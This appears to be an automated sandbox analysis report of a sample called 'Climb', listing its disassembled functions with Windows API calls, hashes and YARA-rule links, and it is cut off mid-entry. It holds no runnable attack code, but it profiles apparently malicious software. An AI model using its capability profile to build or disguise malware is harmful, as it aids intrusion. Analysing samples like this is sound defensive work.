String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 45393422bf50022ed62ccb6528af8fc22c170ef457aa8d9655232b5f9c5a3d82
Instruction ID: 4f48bb9a85ae4b00c04def401ce2ce4e2795392b80764561265afd28a407949a
Opcode Fuzzy Hash: 45393422bf50022ed62ccb6528af8fc22c170ef457aa8d9655232b5f9c5a3d82
Instruction Fuzzy Hash: 07914674A083419FC700EF29C58096AB7F9BF89714F14892DF89A9B351DB31ED46CB92

Function 00AE560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00AC08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?,?,00AC0C4E), ref: 00AC091B
Part of subcall function 00AC08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0936
Part of subcall function 00AC08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0944
Part of subcall function 00AC08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?), ref: 00AC0954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00AE56AE
_wcslen.LIBCMT ref: 00AE57B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00AE582C
CoTaskMemFree.OLE32(?), ref: 00AE5837

Strings

NULL Pointer assignment, xrefs: 00AE5880, 00AE58AF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: bdf81232b86f60e329ab54ad1f517f66df305e30509941484707570b37dcc60a
Instruction ID: b6a3ae0e09654fec8e097f3340cb26de9085b908b307ec178c82140e567bc9c7
Opcode Fuzzy Hash: bdf81232b86f60e329ab54ad1f517f66df305e30509941484707570b37dcc60a
Instruction Fuzzy Hash: 3B910471D00259EFDF11DFA5D981EEEBBB9BF08304F10456AE915AB251EB309A44CFA0

Function 00AF2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00AF2C1F
GetMenuItemCount.USER32(00000000), ref: 00AF2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AF2C79
_wcslen.LIBCMT ref: 00AF2CAF
GetMenuItemID.USER32(?,?), ref: 00AF2CE9
GetSubMenu.USER32(?,?), ref: 00AF2CF7

Part of subcall function 00AC4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC43AD
Part of subcall function 00AC4393: GetCurrentThreadId.KERNEL32 ref: 00AC43B4
Part of subcall function 00AC4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC2F00), ref: 00AC43BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AF2D7F

Part of subcall function 00ACF292: Sleep.KERNEL32 ref: 00ACF30A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 4a0e2b769abd1e7465d7474aa529f94dd83ea9fc26fbf9572e95b33104ec9b1e
Instruction ID: 0549697f068c6dd8c15be0c39726473a01d9c3383e0c6e02a8560e1c02df875e
Opcode Fuzzy Hash: 4a0e2b769abd1e7465d7474aa529f94dd83ea9fc26fbf9572e95b33104ec9b1e
Instruction Fuzzy Hash: 45716D75A00209AFCB11EFA4C945BBEBBB5EF48310F158459F916EB351DB34AD42CB90

Function 00AF88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00AF8992
IsWindowEnabled.USER32(00000000), ref: 00AF899E
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AF8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00AF8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00AF8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00AF8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AF8B1E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 5f9bf753a74b2b292934d24ece50645d0d0840e4933385aa3f83a7fca5398860
Instruction ID: 317e20b53f046973e07343ec22530f6d620a91b965178e02956031bbfe8d5249
Opcode Fuzzy Hash: 5f9bf753a74b2b292934d24ece50645d0d0840e4933385aa3f83a7fca5398860
Instruction Fuzzy Hash: F2718D74600208AFEB21EFE4C884FBEBBB5EF09340F14045AFA55A7261CB79AD41DB51

Function 00ACB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00ACB8C0
GetKeyboardState.USER32(?), ref: 00ACB8D5
SetKeyboardState.USER32(?), ref: 00ACB936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00ACB964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00ACB983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00ACB9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ACB9E7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 168c09e08275b79d0b1fbdd84d971b8785c492194d52bded0b1cad501681009a
Instruction ID: cb71555ba078df16ed8783ea8f387b4365829a6fe7b1ad4b1329b17cff988266
Opcode Fuzzy Hash: 168c09e08275b79d0b1fbdd84d971b8785c492194d52bded0b1cad501681009a
Instruction Fuzzy Hash: 7E51E1A06687D53EFB3643348C46FBA7EA95B06304F09848DE1D5468D2C3EAACC4D771

Function 00ACB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00ACB6E0
GetKeyboardState.USER32(?), ref: 00ACB6F5
SetKeyboardState.USER32(?), ref: 00ACB756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ACB782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ACB79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ACB7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ACB7FF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 32891963dad3c1b2f111f540b89f2b8b8d8721c04ab3a9fb950535b35e5dafcb
Instruction ID: 625273ae801f6ebe2a07288d2f5a6aadcbe2f300c3673ae7c99a004c1a73e7cf
Opcode Fuzzy Hash: 32891963dad3c1b2f111f540b89f2b8b8d8721c04ab3a9fb950535b35e5dafcb
Instruction Fuzzy Hash: F65123A09283D53DFB328374CC56F7ABEA95B01304F09848DE1D95A8D2D396EC84DB70

Function 00A957A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00A95F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00A957E3
__fassign.LIBCMT ref: 00A9585E
__fassign.LIBCMT ref: 00A95879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00A9589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00A95F16,00000000,?,?,?,?,?,?,?,?,?,00A95F16,?), ref: 00A958BE
WriteFile.KERNEL32(?,?,00000001,00A95F16,00000000,?,?,?,?,?,?,?,?,?,00A95F16,?), ref: 00A958F7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 90968377bb85f75d74e6769ba682bf3d9610c1565548512de315871cd3cdd808
Instruction ID: 192addb3f372829d42af217c6d1310c8f8f065a9ce568e560f4736916497bb0c
Opcode Fuzzy Hash: 90968377bb85f75d74e6769ba682bf3d9610c1565548512de315871cd3cdd808
Instruction Fuzzy Hash: EE51BF71E04649DFDF11CFA8D882AEEBBF8EF08310F14455AE951E7291D730AA41CBA0

Function 00A83090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A830BB
___except_validate_context_record.LIBVCRUNTIME ref: 00A830C3
_ValidateLocalCookies.LIBCMT ref: 00A83151
__IsNonwritableInCurrentImage.LIBCMT ref: 00A8317C
_ValidateLocalCookies.LIBCMT ref: 00A831D1

Strings

csm, xrefs: 00A83166

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 1fadb5c830efafdb9758857c09b22d951f7d27e0601ed00baea1870cdd9c5cf0
Instruction ID: 154221a0bc6a9f5fbdcb2bb88a5468ac8e1d301e87087275150c33c89f57b444
Opcode Fuzzy Hash: 1fadb5c830efafdb9758857c09b22d951f7d27e0601ed00baea1870cdd9c5cf0
Instruction Fuzzy Hash: EB41D876E00218ABCF10EF68C885AAEBBB5BF44F14F148295E8146B392D771DF05CB91

Function 00AE1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AE3AD7
Part of subcall function 00AE3AAB: _wcslen.LIBCMT ref: 00AE3AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AE1B6F
WSAGetLastError.WSOCK32 ref: 00AE1B7E
WSAGetLastError.WSOCK32 ref: 00AE1C26
closesocket.WSOCK32(00000000), ref: 00AE1C56

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 292652d528424b1e06e7e7da60a4ddc3d76cb257c043b6d95a5215bd36079adc
Instruction ID: 9788846ce4ed8078e8c2d462b714d91e31931f572a28fa8e9f5b274c91dbb09d
Opcode Fuzzy Hash: 292652d528424b1e06e7e7da60a4ddc3d76cb257c043b6d95a5215bd36079adc
Instruction Fuzzy Hash: 86411531600114AFDB10DFA5C984BBABBFAEF84364F148059F8559B292D770ED81CBE1

Function 00ACD7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ACD7CD,?), ref: 00ACE714

Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ACD7CD,?), ref: 00ACE72D

lstrcmpiW.KERNEL32(?,?), ref: 00ACD7F0
MoveFileW.KERNEL32(?,?), ref: 00ACD82A
_wcslen.LIBCMT ref: 00ACD8B0
_wcslen.LIBCMT ref: 00ACD8C6
SHFileOperationW.SHELL32(?), ref: 00ACD90C

Strings

\*.*, xrefs: 00ACD89E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: c98e6dc4772c92627db01b638230097cc728a1c74f25d9300fb146bf7464ca86
Instruction ID: a8cb046ccd9338a1af3f7d4ebb313fe841bdc0c117ea5c4b5b187b367c36139b
Opcode Fuzzy Hash: c98e6dc4772c92627db01b638230097cc728a1c74f25d9300fb146bf7464ca86
Instruction Fuzzy Hash: 484144719052189EDF12EFA4DA85FDE77B8AF08340F1104FEA509EB141EB34A789CB50

Function 00AF3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AF38B8
GetWindowLongW.USER32(00000000,000000F0), ref: 00AF38EB
GetWindowLongW.USER32(00000000,000000F0), ref: 00AF3920
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AF3952
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AF397C
GetWindowLongW.USER32(00000000,000000F0), ref: 00AF398D
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AF39A7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 7992fbce37cc08615b3a4b1774373d581efa150b43c4174545a453f943514e5a
Instruction ID: 0472b3a88ec5f2a8432e3cfe17e70e7d854fd717c87e66dd0ae423f36cc61217
Opcode Fuzzy Hash: 7992fbce37cc08615b3a4b1774373d581efa150b43c4174545a453f943514e5a
Instruction Fuzzy Hash: 91313632604259EFDF21CF99DC98F7837A5FB86750F2412A4F6108B2B1CBB0A945DB41

Function 00AC808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC80D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC80F6
SysAllocString.OLEAUT32(00000000), ref: 00AC80F9
SysAllocString.OLEAUT32(?), ref: 00AC8117
SysFreeString.OLEAUT32(?), ref: 00AC8120
StringFromGUID2.OLE32(?,?,00000028), ref: 00AC8145
SysAllocString.OLEAUT32(?), ref: 00AC8153

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 574efe097c7b7ce563016ea207e117f70510bb971329ba625777629cff8796ff
Instruction ID: 37818b87d5607c0c17d07c7c6b461873fe3526f8c210718f860bfa736472fdf5
Opcode Fuzzy Hash: 574efe097c7b7ce563016ea207e117f70510bb971329ba625777629cff8796ff
Instruction Fuzzy Hash: AB217F72600219AF9F10EBE8CC88DBA77EDFF09360B058529F905DB290DB74AD46C760

Function 00AC8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC81A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC81CF
SysAllocString.OLEAUT32(00000000), ref: 00AC81D2
SysAllocString.OLEAUT32 ref: 00AC81F3
SysFreeString.OLEAUT32 ref: 00AC81FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00AC8216
SysAllocString.OLEAUT32(?), ref: 00AC8224

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 8696412c15af59033c756b4240b49ee13e794a262cc1d6556efb10a12d2c5feb
Instruction ID: 02a12cb11cc560533a7c8dfafe1f9837d46da41fa506c115275feb2836b7dceb
Opcode Fuzzy Hash: 8696412c15af59033c756b4240b49ee13e794a262cc1d6556efb10a12d2c5feb
Instruction Fuzzy Hash: 87214475604604BF9B11EBE8DC89DBAB7EDFB09360B058129F915CB2A0DB74EC42C764

Function 00AD0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00AD0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AD0ED5

Strings

nul, xrefs: 00AD0F0E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 13b823d12927554da8d8ed0b0f329dd1f9922bf797eb88d5b956bf35d12e1bd0
Instruction ID: 018ff698f3f7fb5f2680b9428d8b81d2686d54ae33c62f6359987aef17932119
Opcode Fuzzy Hash: 13b823d12927554da8d8ed0b0f329dd1f9922bf797eb88d5b956bf35d12e1bd0
Instruction Fuzzy Hash: 83215C7050030AAFDB208F64D805F9A7BA9BF59720F304A5AFCA6E72D0DB70D941DB50

Function 00AD0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AD0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AD0FA8

Strings

nul, xrefs: 00AD0FE0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b2eed29238baaabe5d522774abe296f9aacf2e596e0a795d7ac785c4c8bdf97d
Instruction ID: cdef27124329bae9164a57110ae1316e31fdb5c120bb40ca7413394ce72756f7
Opcode Fuzzy Hash: b2eed29238baaabe5d522774abe296f9aacf2e596e0a795d7ac785c4c8bdf97d
Instruction Fuzzy Hash: 64215E71600345ABDB309FA89C04E9A77E9BF59724F300A1AF8A2E73D0D7709981DB50

Function 00AF4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A67873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A678B1
Part of subcall function 00A67873: GetStockObject.GDI32(00000011), ref: 00A678C5
Part of subcall function 00A67873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A678CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AF4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AF4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AF4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AF4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AF4BE3

Strings

Msctls_Progress32, xrefs: 00AF4B81

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: f016189d746fb1016614a535d6cf8107d9a3f4eadef63e792ec8579878bfd76e
Instruction ID: 9875666462caf3244c12ccd214eee303f85b4beed36f05f093f8f4e9dc3e1e07
Opcode Fuzzy Hash: f016189d746fb1016614a535d6cf8107d9a3f4eadef63e792ec8579878bfd76e
Instruction Fuzzy Hash: FD1193B115021DBEEF119FA4CC85EEB7FADEF08768F014110B708A6060CA71DC21DBA0

Function 00A9DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

